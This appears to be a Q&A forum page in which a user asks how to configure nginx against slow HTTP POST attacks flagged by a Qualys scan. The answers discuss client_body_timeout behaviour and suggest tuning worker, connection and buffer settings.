Slow Http Post attack in Nginx

8k Views Asked by At

To check vulnerability in our app servers, we ran Qualys scan. From the report we found our app servers are vulnerable to slow HTTP Post attack. To mitigate this attack, we have configured nginx in front of app servers based on the Qualys report (https://blog.qualys.com/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks). According to Qualys, if a servers keep the connection open for more than 120 seconds, they consider that server is vulnerable to slow HTTP Post attack. Eventhough nginx default timeout is 60s, it keeps the connection for more than 2 minutes in our app server. We also checked the nginx conneciton status, it keeps the connection in writing state for more than 2 minutes.

Please help us to configure nginx to prevent from slow HTTP Post attack.

Current nginx Configuration

user nginx;
worker_processes auto; 
worker_rlimit_nofile 102400; 

events {
    worker_connections 100000; 
}

access_log off;  
autoindex off;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=2r/s;   
limit_conn_zone $binary_remote_addr zone=limitzone:10m;  
limit_conn_status 403;   
limit_req_status 403;
sendfile on; 
tcp_nopush on; 
tcp_nodelay on; 
keepalive_timeout 20 15; 
client_body_timeout 5s;  
client_header_timeout 5s;  
send_timeout 2;  
reset_timedout_connection on;   
types_hash_max_size 2048;  
server_tokens off;
client_body_buffer_size 100K;  
client_header_buffer_size 1k;  
client_max_body_size 100k;  
large_client_header_buffers 2 1k;

include /etc/nginx/mime.types;
default_type application/octet-stream;

upstream backend {   
    server 127.0.0.1:8080 max_conns=150;   
}

server {  
    listen 443 ssl http2 default_server;
    \# listen [::]:443 ssl http2 default_server;
    server_name *******;
    underscores_in_headers on;

    if ($request_method !~ ^(GET|HEAD|POST|PUT|DELETE)$ ) {
        return 444;
    }

    *** ssl configuration ***
        .....

    location / {  
        limit_conn limitzone 20; 
        limit_req zone=req_limit_per_ip burst=5 nodelay; 
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;   
        proxy_cookie_path / "/; HTTPOnly; Secure; SameSite=strict";   
        proxy_set_header X-Real-IP $remote_addr;  
        proxy_set_header X-Forwarded-Proto https; 
        proxy_pass http://backend;
    }
}
2

There are 2 best solutions below

0
On

From the NGINX docs for client_body_timeout

The timeout is set only for a period between two successive read operations, not for the transmission of the whole request body. If a client does not transmit anything within this time, the request is terminated with the 408 (Request Time-out) error.

(emphasis mine)

I read that as Qualys might be able to keep the connection open by sending chunks after 59 seconds, and then again after 118 seconds—thereby avoiding the timeout while keeping the connection open.

I'm not aware of a specific way to limit “the transmission of the whole request body”.

0
On

Unless you have a very popular site, but for the beginning or a new site, there are a few settings that are set to too high value. You can always adjust it later on after the site go live.

1) worker_rlimit_nofile 102400

Not sure how much memory your server have, but I think this is too large a number, I would suggest to set to something like:

worker_rlimit_nofile 8192;

2) worker_connections 100000

It is generally configure worker_processes and worker_connections based on the number of CPU / cores, content and load. The formula is max_clients/second = worker_processes * worker_connections. The worker_connections value needs not to be at 100000; The default Nginx value is only at 1024, if you have 4 CPU cores, the number of clients that it can handled would be 1024 x 4 = 4096 clients/second.

I would also suggest to add multi_accept on; which informs each worker_process to accept all new connections at a time, opposed to accepting one new connection at a time.

events {
    worker_connections 1024;
    multi_accept on;
}

3) Client body and header size

One of the recommendations on preventing slow http attack is to set reasonably small client_max_body_size, client_body_buffer_size, client_header_buffer_size, large_client_header_buffers, and increase where necessary. But I think you might set these directives too low that it will affect the performance of the server, I would recommend to just use the default values recommended by Nginx http core module for now.

client_header_buffer_size 1k;
client_body_buffer_size 16k;    # 8k for 32-bit or 16k for 64-bit platform
client_max_body_size 1m;
large_client_header_buffers 4 8k;

BTW, as a best practice, all the basic settings should be wrapped within a http directive so that it apply for all http traffic. I would also recommend you set access_log on as it is very useful to have better understanding of the traffic (and attacks) during the early stage of the server deployment.

http {
    access_log off;  
    autoindex off;

    # other settings

    .....

    upstream backend {   
        server 127.0.0.1:8080 max_conns=150;   
    }
}